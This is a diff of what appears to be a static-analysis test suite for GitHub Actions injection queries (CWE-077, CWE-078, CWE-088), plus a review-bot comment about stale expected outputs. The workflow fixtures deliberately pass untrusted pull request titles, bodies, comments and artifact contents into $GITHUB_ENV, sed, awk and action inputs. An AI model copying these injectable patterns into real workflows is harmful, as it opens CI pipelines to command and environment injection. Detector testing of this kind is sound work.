| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref index b3f6c4bf7822..450079a19f67 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref 
+++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvVarInjectionCritical.ql +query: Security/CWE-077/EnvVarInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 94e2af8ecaa7..b751cd05888c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | @@ -92,4 +93,3 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref index fc6a3a80c984..cfc44d8a86df 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref 
@@ -1 +1,2 @@ -Security/CWE-077/EnvVarInjectionMedium.ql +query: Security/CWE-077/EnvVarInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml index 4b6888449c00..b7968c4f7a62 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml +++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml @@ -6,4 +6,4 @@ jobs: steps: - uses: ruby/setup-ruby@v2 with: - ruby-version: ${{ github.event.comment.body }} + ruby-version: ${{ github.event.comment.body }} # $ Alert[actions/command-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index 281fd39552a7..7e3d87977b1f 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected 
@@ -1,6 +1,6 @@ +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref index 7057e60695b8..3dc57e81d632 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-078/CommandInjectionCritical.ql +query: experimental/Security/CWE-078/CommandInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 99ebb1edc05d..be81405805bc 100644 
--- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,5 +1,5 @@ +#select edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref index 9fbbb302a175..41310436d7e3 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-078/CommandInjectionMedium.ql +query: experimental/Security/CWE-078/CommandInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 5d841e50dbb4..2566f6cc674b 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -7,7 +7,7 @@ jobs: test1: runs-on: ubuntu-latest env: - TITLE: ${{github.event.pull_request.title}} + TITLE: ${{github.event.pull_request.title}} # $ Source[actions/argument-injection/critical] steps: - name: Checkout uses: actions/checkout@v4 
@@ -18,50 +18,50 @@ jobs: echo "s/FOO/$TITLE/g" - run: | # VULNERABLE - sed "s/FOO/$TITLE/g" + sed "s/FOO/$TITLE/g" # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - echo "foo" | sed "s/FOO/$TITLE/g" > bar + echo "foo" | sed "s/FOO/$TITLE/g" > bar # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) + echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - awk "BEGIN {$TITLE}" + awk "BEGIN {$TITLE}" # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json + sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json + sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE sed -e 's##${TITLE}#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##TITLE#' \ - .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE sed -e 's##TITLE#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ - .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git log --format=%s) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git diff --name-only HEAD) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > 
/tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git diff --name-only HEAD ) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git diff --name-only HEAD^ | xargs) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # NOT VULNERABLE echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 5eddb791ae5c..4f4d67c2325c 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected 
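Review bot: The `# $ Alert[actions/argument-injection/critical]` markers in the `@@ -18,50 +18,50 @@` hunk are appended inside `run: |` block scalars, where `#` is script text rather than a YAML comment, so each step's script string and end column change. The reordered `ArgumentInjectionCritical.expected` that follows still lists `arg_injection.yml:19:14:21:31` with the label `# VULNERABLE\nsed "s/FOO/$TITLE/g"\n`, without the appended text. That suggests it was not re-run against the annotated fixture, so unless a later patch in the series regenerates it, the `.expected` file should be regenerated after annotating. It is also worth confirming that the Actions inline-expectations implementation reads markers from script lines and not only from YAML comments, otherwise these alerts would presumably be reported as unexpected results. The same pattern appears in the `run: |` hunks for action6, action7, the ultralytics `action.yaml` and `argus_case_study.yml`.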
@@ -1,3 +1,16 @@ +#select +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # 